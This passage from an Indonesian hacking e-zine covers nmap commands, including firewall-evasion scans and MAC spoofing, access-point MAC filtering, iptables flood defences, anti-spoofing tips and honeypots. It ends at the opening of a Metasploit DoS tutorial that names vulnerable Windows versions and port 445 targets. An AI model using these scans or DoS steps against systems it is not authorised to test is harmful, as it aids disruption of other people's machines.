ini.. Ok, kebanyakan penjelasan nih, langsung aja ah,.... Open Terminal Truz Coba Aja Satu-Satu kayak gambar dibawah ini
  • 38. 38e-ZIT #Vol 2 - Networking Neh, Command-Commandnya Code: nmap -n -sn [ip target] < Multi ip address dan subnet nmap --packet-trace [ip target] < Menampilkan paket diterima dan dikirim nmap --iflist < Menampilkan semua interface dan rute nmap 192.168.2.0/24 --exclude [IP] < Excluding hosts/networks nmap -A [ip target] < Scan OS Dan Layanan (service target) nmap -O [ip target] < remote operating system nmap -sP [ip target] < Mendeteksi layanan dan device yang sedang up nmap -sV [ip target] < Mendeteksi versi dari layanan (service) nmap -sA [ip target] < Mendeteksi firewall Code: nmap -sN [ip target] < Scanning firewall | TCP Null Scan untuk menipu firewall untuk memberikan respon ,dalam kondisi TCP flag header adalah nol (null) nmap -sF [ip target] < Scanning firewall | TCP Fin scan untuk mengecek firewall ,hanya TCP FIN bit nmap -sX [ip target] < Scanning firewall | Penggunaan TCP Xmas & setting FIN, PSH, dan URG Code: nmap -f [site target] < Firewall untuk packets fragments nmap -PN [site target] < Melakukan scanning disaat target menggunakan firewall nmap -F [ip target] < Fast Scann nmap --reason [ip target] < Opsi Reason nmap --open [ip target] < Menampilkan hanya port yang terbuka nmap -T5 [ip target] < Scanning terhadap subnet
  • 39. 39e-ZIT #Vol 2 - Networking Code: nmap -p 80 [ip target] < Melakukan scann terhadap port tertentu .. dalam hal ini port 80 nmap -p T:80 [ip target] < Melakukan scann terhadap port tertentu dengan protokol tcp nmap -p U:53 [ip target] < Melakukan scann terhadap port tertentu dengan protokol udp Code: nmap -p "*" [ip target] < Scann seluruh port dengan opsi "*" nmap --top-ports 3 [IP] < top ports nmap -sO [ip target] < IP protocol PING nmap -PS [ip target] < TCP ACK (PA) and TCP Syn (PS) ping nmap -PA [ip target] < Untuk penggunaan TCP Syn Code: nmap -sS [ip target] < TCP SYN Scan | Penggunaan Stealthy scan [-sS] nmap -sT [ip target] < TCP SYN Scan | TCP connect scan (warning: no stealth scan) [-sT] nmap -sA [ip target] < TCP SYN Scan | Menemukan keberadaan TCP ports menggunakan TCP ACK scan [-sA] nmap -sW [ip target] < TCP SYN Scan | Menemukan keberadaan TCP ports menggunakan TCP Window scan [-sW] nmap -sM [ip target] < TCP SYN Scan | Menemukan keberadaan TCP ports menggunakan TCP Maimon scan Code: nmap -PO [ip target] < IP protocol ping nmap -sU [ip target] < UDP services (UDP scan) nmap -PU [ip target] < UDP ping | Melakukan scanning terhadap ip, khusus mencari port UDP nmap -PU 2000.2001 [ip target] < UDP ping | Melakukan scanning port UDP yang telah di tentukan Code: nmap --spoof-mac [mac address palsu kita] [ip target] < MAC address spoofing nmap --spoof-mac 0 [IP HOST] < Jika anda hendak menggunakan mac address spoofing secara random (acak) Mungkin itu saja sedikit command-command NMAP dari saya,,, silahkan di coba ... eheheheheh ./regards Bifi
  • 40. 40e-ZIT #Vol 2 - Networking Security > Setting Mac Filtering Pada AP TP-LINK TL-WA610G yup yup...i'm back....sesuai dengan judulnya, kali ini qt akan membangun security mac filtering... sedikit penjelasan :  Wireless Access Point (WAP) adalah perangkat keras yang memungkinkan perangkat wireless lain (seperti laptop, ponsel) untuk terhubung ke jaringan kabel menggunakan Wi-fi, bluetooh atau perangkat standar lainnya.  Access Point berfungsi sebagai pengatur lalu lintas data, sehingga memungkinkan banyak Client dapat saling terhubung melalui jaringan. Sebagai Hub/Switch yang bertindak untuk menghubungkan jaringan lokal dengan jaringan wireless/nirkabel, Access point dapat memancarkan atau mengirim koneksi data / internet melalui gelombang radio, ukuran kekuatan sinyal juga mempengaruhi area coverage yang akan dijangkau, semakin besar kekuatan sinyal (ukurannya dalam satuan dBm atau mW) semakin luas jangkauannya.  Media Acces Control (MAC) adalah identitas sebuah perangkat jaringan yg direprensentasikan dalam bentuk hardware-address atau physical address untuk setiap node yg terhubung dalam sebuah jaringan sedikit lagi penjelasan yak...yang sabar yak, kata pepatah, orang sabar selalu berada disamping pagar Quote:MAC filter fungsinya untuk menseleksi komputer mana yang boleh masuk kedalam jaringan berdasarkan MAC Address. Bila tidak terdaftar, tidak akan bisa masuk ke jaringan. MAC filter Address akan membatasi user dalam mengakses jaringan wireless. Alamat MAC dari perangkat komputer user akan didaftarkan terlebih dahulu agar bisa terkoneksi dengan jaringan wireless, ok langsung kita masuk k intinya...persiapan : 1. Laptop/PC juga boleh 2. Kabel LAN (minimal 1 meter) lebih juga boleh 3. Access Point (kali ini ane menggunakan TP-LINk TLWA610G) 4. yang paling penting adalah rokok coy tahap : 1. colok kabel LAN ke AP lalu ujung yg satunya lagi colok ke LAN card laptop 2. buka browser, ketik pada address bar ketik 192.168.1.1 lalu tekan enter. qt akan diminta memasukan username dan password. default username dan password pada acces point adalah username : admin password : admin.... lalu tekan enter...
  • 41. 41e-ZIT #Vol 2 - Networking 3. setelah masuk ke tampilan awal, lalu click network, seperti d bawah ini : o Type : ada dua pilihan, yaitu static IP dan Dinamic IP (DHCP). pilih sesuai kebutuhan. kali ini ane make Static IP (ipnya qt input manual) o IP Addres, defaultnya tadi 192.168.1.1, bisa diganti, terserah teman-teman sekalian mau diganti degan berapa, kali ini qt ganti dengan 192.168.1.111 (IP kelas C) o Subnet mask, qt masukan 255.255.255.0 o Gateway : qr masukan 192.168.1.250, gateway tergantung settingan d tempat teman2.... o Click Save
  • 42. 42e-ZIT #Vol 2 - Networking 4. setelah itu click wireless lalu click basic settings, seperti dibawah ini : o SSID : Terserah mau dinamakan apa o Region/regional : ane masukan Indonesia..cinta negeri sendiri coy (nyari aman :-P) o Channel : terserah teman2 sekalian,defaultnya 6.. o Mode : defaultnya 54Mbps (802.11g), make default juga boleh o click save lagi coy 5. selanjutnya click Mac Filtering, lalu click Enable, untuk mengaktifkan mac filteringnya, lalu click Deny
  • 43. 43e-ZIT #Vol 2 - Networking 6. lanjut coy, click DHCP, lalu click DHCP setting, kegunaan dari DHCP adalah agar client mendapat IP secara otomatis, biar nggak nambah kerjaan qt untuk setting manual d lepi/kompi client... o click enable pada DHCP SERVER o Start IP Address : ane masukan 192.168.1.100, tpi tergantung teman2 mau start IP-nya mulai dari berapa o End IP address : ane masukan 192.168.1.199 o Address Least Time dibiarin default aja o Default Gateway : qt masukan sama dengan yg qt masukan pada point 3 tadi yaitu 192.168.1.250 o Primary DNS : masukan primary DNS-nya o Secondary DNS : alternatif DNS (cadangan) o click save lagi coy 7. Selanjutnya qt ganti username and password AP : Click System Tools --> Password.... seperti dibawah ini
  • 44. 44e-ZIT #Vol 2 - Networking o Old user name : defaultnya admin o Old Passwrod : defaultnya admin o New User Name : masukan username yg baru o New Password : Masukan Password yg baru o Confirm New Password : masukan lagi password yg baru o lalu click save, jgn lupa reboot AP 8. selesai AP direboot, ketik 192.168.1.111 pada address bar browser, masukan username and password yg baru qt ganti tadi.....hihihih 9. Untuk menambahkan pengguna baru, click Wireless --> Mac Filtering --> Add New..SS-nya d bawah ini:
  • 45. 45e-ZIT #Vol 2 - Networking lalu qt dihadapkan pada tampilan berikut : o MAC ADDRESS : masukan mac address calon pengguna o Description : namai pengguna baru, misal JIN lalu click save yup...akhirnya selesai juga...hihihhii Quote: settingan berbeda-beda, tergantung dari jenis AP-nya ./regards Mavis Vermilion
  • 46. 46e-ZIT #Vol 2 - Networking Security > Mencegah Serangan Ping Flooding Dengan Iptables heuheu Salam Backtrackers jumpa lagi nih ye,, ok langsung saja, sesuai judulnya kali ini Bifi mau share cara Mencegah Serangan Ping Flooding Dengan Iptables,,,, nah apa itu iptables,,, ne penjelasannya : iptables adalah suatu tools dalam sistem operasi linux yang berfungsi sebagai alat untuk melakukan filter (penyaringan) terhadap (trafic) lalulintas data. Secara sederhana digambarkan sebagai pengatur lalulintas data. Dengan iptables inilah kita akan mengatur semua lalulintas dalam komputer kita, baik yang masuk ke komputer, keluar dari komputer, ataupun traffic yang sekedar melewati komputer kita. dan ping flooding : Software ini hanya dijalankan di Windows dan menggunakan System PING dan ICMP Protocol yang memungkinkan pengiriman paket dengan cepat. Korban dari ping flood ini antara lain modem, windows, Linux, router, dan server. Semua sistem operasi dan mesin dijaringan komputer yang memiliki IP address bisa diserang tanpa terkecuali. Efek dari ping flood ini, yaitu aktifitas komputer korban yang meningkat serta traffic jaringan komputer penuh. nah udah jelas apa belum...?? ok udah ngerti kan. langsung aja yah... #Lets Rock buka editor kaka, terus ketikan kalimat-kalimat cinta di bawah ini... 1. Mencegah paket Syn Flood Attack Buat sebuah file bernama closesyn.sh atau apalah terserah kaka, yang isinya sebagai berikut untuk mencegah serangan syn flood Code: #!bin/sh #Menghapus semua Rule iptables -F iptables -X iptables -P INPUT ACCEPT iptables -P OUTPUT ACCEPT iptables -P FORWARD ACCEPT #blok paket syn yang dicurigai jahat iptables -N synjahat iptables -A INPUT -p tcp --syn -j synjahat iptables -A synjahat -m limit --limit 1/s --limit-burst 3 -j ACCEPT iptables -A synjahat -j DROP trus jalankan scriptnya, kayak gini zbyte@bt:~# sh closesyn.sh
  • 47. 47e-ZIT #Vol 2 - Networking 2. Mencegah Ping Flood attack Buat sebuah file bernama closeping.sh yang isinya sebagai berikut untuk mencegah serangan ping flood Code: #!bin/sh #Menghapus semua Rule iptables -F iptables -X iptables -P INPUT ACCEPT iptables -P OUTPUT ACCEPT iptables -P FORWARD ACCEPT #blok paket ping(icmp) yang dicurigai jahat iptables -N pingjahat iptables -A INPUT -p icmp -j pingjahat iptables -A pingjahat -m limit --limit 1/s --limit-burst 2 -j ACCEPT iptables -A pingjahat -j DROP jalankan scriptnya, contoh zbyte@bt:~#sh closeping.sh keterangan syntax iptables yang Zbyt3 pake -F (–flush) = Mengosongkan aturan pada sebuah chain -X (–delete-chain) = Menghapus rantai yang disebutkan -N (–new-chain) = Membuat rantai baru -P (–policy) = Membuat kebijakan default pada sebuah rantai -p (–protocol) = Mengecek tipe protokol tertentu. Tanda inverse(!) berarti kecuali. Misalnya protocol ! tcp berarti kecuali tcp -A (–append) = Menambah aturan pada akhir rantai sehingga akan dieksekusi terakhir -m (multiport –source-port) = Mendefinisikan port atau port range lebih dari satu -j (–jump) = Perlakuan yang diberikan terhadap paket-paket yang memenuhi kriteria. Setelah perintah ini ada beberapa opsi yaitu: ACCEPT: akan mengijinkan paket DROP: akan menolak paket REJECT: akan menolak paket nah untuk lebih jelasnya tentang iptables kunjungi : https://help.ubuntu.com/community/IptablesHowTo or http://andreslinuxer.wordpress.com/2010/...-iptables/ mungkin itu saja yang bisa Bifi share malam ini.... pegel ni tangan... sekian dan terima kasih.... ./regards Bifi
  • 48. 48e-ZIT #Vol 2 - Networking Security > Mencegah Serangan ARP, DNS/DHCP Spoofing & SSLstrip Oke Langsung Saja… 1. Pencegahan ARP, DNS/DHCP Spoofing Mengubah ARP komputer kita dari dinamyc ke static caranya : * Untuk Windows : masuk ke menu "Run" ketik "cmd" setelah muncul layarhitam (konsole ) ketik "getmac" untuk melihat MACADDRES Dan "ipconfig" untuk melihat ip addres komputer anda Misalnya: MACADDRES yang anda punya"18:f4:6a:75:3e:cd" dan Ip addres anda 192.168.88.7. langakah selanjutnya Mengubah ARP Anda menjadi static.. Perintahnya : "arp -s [Ip_Addres ] [MAC_Anda]" Jadi seperti ini: "Arp -s 192.168.88.7 18:f4:6a:75:3e:cd" * Untuk Linux : Buka konsole (terminal) ketik "macchanger -s wlan0" untuk menampilkan MACADDRES yang anda miliki,ingat..!! "sesuaikan device wireless yang anda gunakan" kalau saya "wlan0" Misalnya :MACADDRES anda "07:f4:6a:71:3e:ce" . Langkah selanjutnya Mengubah ARP anda Menjadi Static Perintahnya:"arp -i wlan0 -s 192.168.88.7 07:f4:6a:75:3e:ce" 2. Pencegahan SSLstrip Serangan MITM dengan sslstrip ini dilakukan dengan memanfaatkan kemalasan pengguna untuk langsung menggunakan https. Pengguna yang malas memilih untuk menggunakan http biasa dan berharap di-redirect ke url https otomatis atau menemukan link ke url https. Padahal pada saat pengguna menggunakan http biasa itulah pengguna berpotensi terkena serangan mitm. Bila pengguna langsung menggunakan https, maka pengguna akan aman dan terbebas dari serangan mitm. Jadi mulai sekarang biasakanlah mengetikkan https:// di URL anda bila ingin mengakses situs yang sensitif. misalnya twitterl,ymail,facebook,paypal dll
  • 49. 49e-ZIT #Vol 2 - Networking Melakukan Ping terhadap website yang anda ingin kunjungi contoh : root@assock:~#ping http://www.twitter.com PING 10.0.18.76 (10.0.18.76) 56(84) bytes of data. 64 bytes from 10.0.18.76: icmp_seq=1 ttl=64 time=0.063 ms 64 bytes from 10.0.18.76: icmp_seq=2 ttl=64 time=0.051 ms 64 bytes from 10.0.18.76: icmp_seq=3 ttl=64 time=0.050 ms 64 bytes from 10.0.18.76: icmp_seq=4 ttl=64 time=0.047 ms 64 bytes from 10.0.18.76: icmp_seq=5 ttl=64 time=0.053 ms 64 bytes from 10.0.18.76: icmp_seq=6 ttl=64 time=0.050 ms hasil ping di atas menunjukan bahwa DNS anda telah di alihkan ke Ip 10.0.18.76 yang bukan Real addres Facebook ok mungkin bisa membantu agar teman-2 tidak menjadi korban...!!! ./regards shockw4f3
  • 50. 50e-ZIT #Vol 2 - Networking Security > Apa Itu Honeypot ? Honeypot ? apa itu ? apa fungsinya ? kenapa tiba-tiba nongol di e-ZIT ? Yosh, e-ZIT menulis Thread ini berdasarkan request dari teman-teman ZIT Divisi Networking, nah berikut ini sedikit penjelasan mengenai “Apa Itu Honeypot” Sejarah Ada beberapa definisi honeypot yang disampaikan oleh beberapa peneliti honeypot pada makalah sistem kemanan yang mereka buat maupun dari halaman web. Menurut Lance Spitzner, seorang arsitek sistem keamanan Sun Microsystems, ”A honeypot is security resource whose value lies in being probed, attacked, or compromised.” Definisi ini menjadi acuan beberapa makalah lainnya. Dari definisi itu dapat diambil kesimpulan bahwa honeypot baru dikatakan suatu sistem keamanan jika honeypot tersebut disusupi, diserang, atau dikendalikan oleh penyerang. Ada juga seorang insinyur berkebangsaan Swiss bernama Reto Baumann menyikapi interpretasi yang diberikan oleh Lance Spitzner. Menurut Baumann melalui tugas akhir diplomanya, ” A honeypot is a resource which pretends to be a real target. A honeypot is expected to be attacked or compromised. The main goals are the distraction of an attacker and the gain of information about an attack and the attacker.Jadi menurut Baumann, honeypot adalah sebuah sumber daya sistem keamanan yang dibuat sebagai tujuan utama penyerang yang sebenarnya merupakan sistem yang palsu untuk menjebak penyerang. Sistem honeypot biasanya hanya sebuah sistem yang dihubungkan dengan jaringan produktif, atau sistem yang asli, yang ada dengan tujuan untuk menjebak penyerang. Konsep serupa honeypot (sebelumnya belum diberi istilah seperti itu) dipercaya sudah cukup lama ada, walaupun tidak ada literatur yang membahasnya sebelum tahun 1990. Tahun 1990 Clifford Stoll menerbitkan buku The Cuckoo’s Egg, yang lebih mirip cerita detektif. Penerbitnya Pocket Books, yang lebih dikenal dengan novel. Inilah penerbitan pertama yang menguraikan konsep honeypot. Buku ini menceritakan kejadian sesungguhnya selama periode sepuluh bulan di tahun 1986-1987. Stoll adalah astronom pada Lawrence Berkeley Lab yang menjadi admin berbagai komputer untuk komunitas astronom. Selisih akuntansi senilai 75 sen membuatnya menyadari akan adanya hacker bernama Hunter, yang telah menyusup ke dalam sistem. Bukannya menutup account penyusup ini, Stoll malah membiarkannya berada dalam sistem, agar dapat mempelajarinya lebih jauh dan memburunya. Tanpa disadari penyerang, Stoll menyiapkan direktori SDINET (Strategic Defence Initiave Network) dan mengisinya dengan file-file yang pura-pura berisi berbagai file keuangan dan rahasia negara. Hacker ini ternyata tidak tertarik pada file-file keuangan. Makalah teknis pertama mengenai honeypot terbit
  • 51. 51e-ZIT #Vol 2 - Networking pada tahun 1990 itu juga, tulisan Bill Cheswick berjudul ‘An Eve-ning with Berfeld in Which a Cracker Is Lured, Endured and Studied’ . Berbeda dengan yang pertama, Cheswick memang menyiapkan suatu sistem yang memang untuk diserang, menjadikannya kasus pertama dari honeypot yang sesungguhnya. Pada makalah ini Cheswick bukan saja membahas cara membangun dan menggunakan honeypot, melainkan juga menceritakan bagaimana seorang hacker Belanda dipelajari sewaktu dia menyerang dan menguasai sistem. Cheswick pertama-tama membangun suatu sistem dengan beberapa kelemahan (termasuk Sendmail) untuk mendapatkan ancaman apa saja yang ada dan bagaimana cara kerjanya. Tujuannya bukanlah untuk menangkap orang tertentu, melainkan untuk mempelajari kegiatan membahayakan apa saja yang bisa terjadi terhadap network dan sistemnya. Cheswick menciptakan suatu lingkungan terkontrol yang disebutnya sebagai jail (ia tidak menyebutnya sebagai honeypot), yang mengurung kegiatan sang penyerang. Hacker Belanda dengan nickname Berfeld ini memasuki sistem dengan memanfaatkan kelemahan pada Sendmail sampai mendapatkan kendali terhadap sistem. Secara umum, honeypot dapat didefinisikan sebagai sebuah sumber daya sistem informasi dimana nilai guna dari sumber daya tersebut justru berdasar kepada terdeteksinya kasus penggunaan yang tidak terotorisasi atau tidak diperbolehkan secara hukum dari sumber daya tersebut. Atau dengan kata lain, honeypot adalah sebuah sumber daya yang bersifat seakan-akan target yang sebenarnya, yang dengan sengaja disediakan untuk diserang atau diambil alih. Oleh karena itu, honeypot akan diamati, diserang bahkan dieksploitasi oleh penyerang atau penyusup. Tujuan utama dari honeypot ini adalah untuk mengumpulkan informasi dari suatu serangan dan penyerang yang melakukannya. Intruder atau penyerang merupakan istilah umum yang diberikan untuk menggambarkan seseorang yang berusaha untuk masuk ke dalam sistem dalam arti berusaha menggunakan sistem dimana mereka tidak memiliki autorisasi atau menggunakan sistem untuk maksud yang menyimpang di luar hak-hak yang mereka miliki. Tipe Honeypot Honeypot dibagi menjadi dua tipe dasar, yaitu production honeypot dan research honeypot. Tujuan utama dari production honeypot adalah untuk membantu mengurangi resiko keamanan jaringan pada sebuah organisasi. Production honeypot memberikan suatu nilai tambah bagi keamanan jaringan dari suatu organisasi. Tipe kedua, research honeypot, adalah honeypot yang didesain untuk mendapatkan informasi mengenai aktivitas-aktivitas dari komunitas penyerang atau penyusup. Research honeypot tidak memberikan suatu nilai tambah secara langsung kepada suatu organisasi, melainkan digunakan sebagai alat untuk meneliti ancaman-ancaman keamanan yang mungkin dihadapi dan bagaimana cara untuk melindungi diri dari ancaman tersebut.
  • 52. 52e-ZIT #Vol 2 - Networking Klasifikasi Honeypot Honeypot dapat diklasifikasikan berdasarkan pada tingkat interaksi yang dimilikinya. Tingkat interaksi dapat didefinisikan sebagai tingkat aktivitas penyerang atau intruder di dalam sistem yang diperbolehkan maka semakin tinggi pula tingkat interaksi honeypot. LOW INTERACTION HONEYPOT Low-interaction honeypot merupakan honeypot dengan tingkat interaksi honeypot, yaitu honeypot yang didesain untuk mengemulasikan service (layanan) seperti pada server yang asli. Penyerang hanya mampu memeriksa dan terkoneksi ke satu atau beberapa port. Kelebihan low-interaction honeypot yaitu:  Mudah di install, dikonfigurasi, deployed, dan dimaintain  Mampu mengemulasi suatu layanan seperti http, ftp, telnet, dsb.  Difungsikan untuk deteksi serangan, khususnya pada proses scanning atau percobaanpembukaan koneksi pada suatu layanan. Kekurangan low-interaction honeypot :  Layanan yang di berikan hanya berupa emulasi, sehingga penyerang tidak dapat berinteraksi secara penuh dengan layanan yang diberikan atau sistem operasinya secara langsung  Informasi yang bisa kita dapatkan dari penyerang sangat minim.  Apabila serangan dilakukan oleh “real person” bukan “automated tools” mungkin akan segera menyadari bahwa yang sedang dihadapi merupakan mesin honeypot, karena keterbatasan layanan yang bisa diakses. MEDIUM INTERACTION HONEYPOT Kelebihannya Medium Interaction Honeypot:  Memiliki kemampuan yang lebih banyak untuk berinteraksi dengan penyerang dibandingkan low-interaction honeypot namun tidak sebanyak high-interaction honeypot.  Emulasi layanan dapat ditambahkan berbagai macam fitur tambahan sehingga seakanakan penyerang benar-benar sedang berinteraksi dengan layanan yang sebenarnya.  Contoh: script untuk mengemulasikan IIS web server dengan berbagai macam informasi tambahan yang menyertai web server tersebut sehingga benar-benar terlihat seperti aslinya, atau pun juga membuat emulasi IIS yang dapat berinteraksi
  • 53. 53e-ZIT #Vol 2 - Networking dengan suatu jenis worm, sehingga kita bisa mendapatkan payload dari worm tersebut untuk dianalisis selanjutnya.  Contoh: menggunakan jail atau chroot, yaitu membangun sistem operasi virtual pada partisi yang terpisah didalam sistem operasi yang sebenarnya dimana sistem operasi virtual tersebut sepenuhnya di kontrol oleh sistem operasi yang sebenarnya, cara ini dapat memberikan suasana sistem operasi yang sesungguhnya bagi penyerang. Kekurangan Medium Interaction Honeypot :  Sistem tersebut cukup kompleks.  Memerlukan usaha lebih untuk maintain dan deploy sistem tersebut sehingga akses yang diberikan kepada penyerang benar-benar terjamin tingkat keamanannya namun tetap dapat memberikan suasana sistem yang nyata bagi penyerang sehingga penyerang tersebut tidak curiga bahwa aktivitasnya sedang di monitor. HIGH INTERACTION HONEYPOT Pada high-interaction honeypot terdapat sistem operasi dimana penyerang dapat berinteraksi langsung dan tidak ada batasan yang membatasi interaksi tersebut. Menghilangkan batasan-batasan tersebut menyebabkan tingkat risiko yang dihadapi semakin tinggi karena penyerang dapat memiliki akses root. Pada saat yang sama, kemungkinan pengumpulan informasi semakin meningkat dikarenakan kemungkinan serangan yang tinggi. Dikarenakan penyerang dapat berinteraksi secara penuh dengan sistem operasi, maka apabila si penyerang telah mendapat akses root. Kelebihannya :  Penyerang berinteraksi langsung dengan sistem yang nyata termasuk diantaranya sistem operasi, network, hingga layanan yang diberikan ( web, ssh service, mail service, dll )  Umumnya dibangun suatu sistem khusus dengan topologi yang telah dipersiapkan.  Sistem tersebut biasanya terdiri dari berbagai macam implementasi dari teknologi keamanan yang banyak digunakan untuk melindungi suatu sistem, seperti firewall, IDS/IPS, router, dll.  Target serangan berupa sistem operasi sebenarnya yang siap untuk berinteraksi secara langsung dengan penyerang. Kekurangannya :  Perencanaan dan implementasi sistem jauh lebih rumit dan dibutuhkan banyak pertimbangan.
  • 54. 54e-ZIT #Vol 2 - Networking  High-interaction honeypot bersifat tidak efisien karena membutuhkan pengawasan berkala.  Apabila telah diambil alih oleh penyerang maka honeypot tersebut dapat menjadi ancaman bagi jaringan yang ada. SEJARAH WIRELESS HONEYPOT Kemajuan teknologi honeypot mulai terlihat ketika Kevin Poulsen pada tahun 2002 mempublikasikan penelitiannya, Wi-Fi Honeypots a New Hacker Trap , penelitian Poulsen ini dianggap beberapa pihak sebagai teknologi wireless honeypot yang pertama. Suatu tim peneliti, WISE ( Wireless Information Security Experiment ) pada tahun 2002 didirikan oleh SAIC ( Science Applications International Corporation ) di Washington DC, Amerika Serikat. Tim peneliti ini meneliti celah keamanan jaringan wireless pada waktu itu, tim tersebut mendapati bahwa kebanyakan jaringan wireless pada saat itu sangat mudah untuk disusupi dan sangat terbuka. Jenis ancaman yang ditemukan adalah akses yang tidak terotorisasi, penggunaan jaringan wireless yang ilegal, mendengarkan proses komunikasi pada wireless secara ilegal ( eavesdropping ). Ancaman kemanan tersebut merupakan ancaman keamanan yang paling utama dan paling sering terjadi saat ini. Pada akhir 2002, sebuah organisasi bernama Tenebris mempublikasikan hasil penelitian mereka, yaitu pengumpulan data dari wireless honeypot yang mereka implementasikan di Ottawa ( Canada ) dan menyimpulkan bahwa sangat banyak terjadi aktivitas war driving saat itu dan apa saja yang sering menjadi target serangan para penyerang di jaringan wireless. Selanjutnya, Tenebris melanjutkan riset mereka di sekitar kota London lalu menuju Adelaide, South Australia. SKENARIO SERANGAN PADA JARINGAN WIRELESS Dari beberapa penelitian sebelumnya, ada suatu bentuk pola skenario serangan yang umum terjadi pada sistem keamanan wireless. Setidaknya ada tiga pola skenario serangan, yaitu:  Serangan yang sebenarnya ditujukan ke jaringan kabel ( LAN ) dengan memakai jaringan wireless sebagai media untuk menyusup ke LAN.  Serangan yang langsung ditujukan kepada pengguna jaringan wireless. Jenis serangan ini menyerang perangkat wireless user.  Serangan yang ditujukan ke infrastruktur jaringan wireless secara keseluruhan. Jenis serangan ini biasanya bertujuan mengambil alih akses penuh jaringan wireless. ARSITEKTUR WIRELESS HONEYPOT Secara umum arsitektur wireless honeypot yang akan diimplementasikan adalah sebagai berikut.  Wireless Access Point ( WAP ) sebagai media prasarana jaringan wireless.
  • 55. 55e-ZIT #Vol 2 - Networking  Wireless Client ( WC ) merupakan pihak pengguna jaringan wireless ( user ).  Wireless Monitor ( WMON ) sebagai perangkat yang merekam trafik jaringan.  Wireless Data Analysis ( WDA ) berfungsi menganalisis trafik dari WMON  Wired Instructure ( WI ) merupakan infrastruktur LAN. Saya informasikan kepada pembaca, jika anda membeli perangkat telekomunikasi, sebaiknya yang sudah di sertifikasi atau yang sudah bersertifikat resmi dari postel, untuk menjaga agar anda tidak berurusan dengan pihak yang berwajib. Dan perangkat yang sudah di sertifikasi tentunya sudah lulus pengujian di balai uji, sehingga mutu dan kualitasnya terjamin. Penempatan Honeypot  Eksternal Placement, honeypot diposisikan berhadapan langsung dengan internet, jadi tidak ada firewall di depan honeypot.  Internal Placement, honeypot tidak terkoneksi langsung ke internet tetapi berada di antara firewall dan koneksi internet.
  • 56. 56e-ZIT #Vol 2 - Networking  DMZ Placement, honeypot diposisikan dalam firewall DMZ (demilitarized zone). Biasanya digunakan pada sebuah perusahaan besar dengan sistem jaringan yang besar. Sumber :  Seminar Security Jaringan (khususnya pembicaranya, lupa namanya, tapi senyumnya… MANTAB )  NeoTek Vol. V – No. 1 Referensi > http://bisnistypeapproval.wordpress.com/2009/05/01/jaringan-honeypot/ Yarp, gemana ? udah pada tau “Apa Itu Honeypot” kan, tertarik untuk mencobanya atau menerapkannya ? Kalo udah di coba jangan lupa di share yah….. Special Thank.z To > Keygen, Surtua, Gunners, Thektor, Rulex, Error and All Crew ZIT Networking Division ./regards e-ZIT
  • 57. 57e-ZIT #Vol 2 - Networking Network Attack > DoS Attack With Metasploit Hai-Hai . . . Salam Bcktrackers Jumpa lagi sama saya Bifi yang Cool . . . wkwkw Yups, kali Bifi mau share neh, sesuai kayak judul di atas, DOS With Metasploit, buat yang biasa jadi penjahat di komputer pasti udah tau kan apa itu metasploit... ok neh penjelasannya DoS (Denial of Service) > adalah jenis serangan terhadap sebuah komputer atau server di dalam jaringan internet dengan cara menghabiskan sumber (resource) yang dimiliki oleh komputer tersebut sampai komputer tersebut tidak dapat menjalankan fungsinya dengan benar sehingga secara tidak langsung mencegah pengguna lain untuk memperoleh akses layanan dari komputer yang diserang Țersebut.. Metasploit > Metasploit merupakan sofware security yang sering digunakan untuk menguji coba ketahanan suatu sistem dengan cara mengeksploitasi kelemahan software suatu sistem... sekian thread saya, makasih,,, wkwkwkw eh belum belum,,, lanjoot,, Okok,, Sebelum Melakukan Aksi Kali Ini, Mending Kita Liad Persyaratannya Dolo... neh, DoS hanya bisa dilakukan ke Seri Windows yang tertera dibawah. Windows 7 dan Vista dan Windows 8 belum/tidak bisa. Code : Microsoft Windows XP Tablet PC Edition SP2 Microsoft Windows XP Tablet PC Edition SP1 Microsoft Windows XP Tablet PC Edition Microsoft Windows XP Professional x64 Edition Microsoft Windows XP Profesional SP2 Microsoft Windows XP Professional SP1 Microsoft Windows XP Professional Microsoft Windows XP Media Center Edition SP2 Microsoft Windows XP Media Center Edition SP1 Microsoft Windows XP Media Center Edition Microsoft Windows XP Home SP2 Microsoft Windows XP Home SP1 Microsoft Windows XP Home Microsoft Windows XP Emas 0 Microsoft Windows XP Embedded SP1 Microsoft Windows XP Embedded Microsoft Windows XP 64-bit Edition Versi 2003 SP1
  • 58. 58e-ZIT #Vol 2 - Networking Microsoft Windows XP 64-bit Edition 2003 Versi Microsoft Windows XP 64-bit Edition SP1 Microsoft Windows XP 64-bit Microsoft Windows XP 0 Microsoft Windows Server 2003 Web Edition SP1 Beta 1 Microsoft Windows Server 2003 Web Edition SP1 Microsoft Windows Server 2003 Web Edition Microsoft Windows Server 2003 Standard x64 Edition Microsoft Windows Server 2003 Standard Edition SP1 Beta 1 Microsoft Windows Server 2003 Standard Edition SP1 Microsoft Windows Server 2003 Standard Edition Microsoft Windows Server 2003 Enterprise x64 Edition Microsoft Windows Server 2003 Enterprise Edition SP1 Beta 1 Itanium Microsoft Windows Server 2003 Enterprise Edition SP1 Itanium Microsoft Windows Server 2003 Enterprise Edition Itanium 0 Microsoft Windows Server 2003 Enterprise Edition SP1 Beta 1 Microsoft Windows Server 2003 Enterprise Edition SP1 Microsoft Windows Server 2003 Enterprise Edition Microsoft Windows Server 2003 Datacenter x64 Edition Microsoft Windows Server 2003 Datacenter Edition SP1 Beta 1 Itanium Microsoft Windows Server 2003 Datacenter Edition SP1 Itanium Microsoft Windows Server 2003 Datacenter Edition Itanium 0 Microsoft Windows Server 2003 Datacenter Edition SP1 Beta 1 Microsoft Windows Server 2003 Datacenter Edition SP1 Microsoft Windows Server 2003 Datacenter Edition Microsoft Windows 2000 Server SP4 Microsoft Windows 2000 SP4 Professional Microsoft Windows 2000 Datacenter Server SP4 Microsoft Windows 2000 Advanced Server SP4 siapkan alat dan bahan... 1. Sebuah PC/Laptop Yang Udah Terkoneksi 2. Nmap Untuk Scan Traget 3. Metasploit 4. Korban Nb > Ini Hanya bisa di lakukan pada 1 jaringan yang sama . . . alias ngana baconnect di situ, korban juga di situ kabawa... step 1... scan target with nmap doloo, Scan dengan nmap, untuk cari tau OS Korban n cari yang port 445 yang terbuka... kayak gini
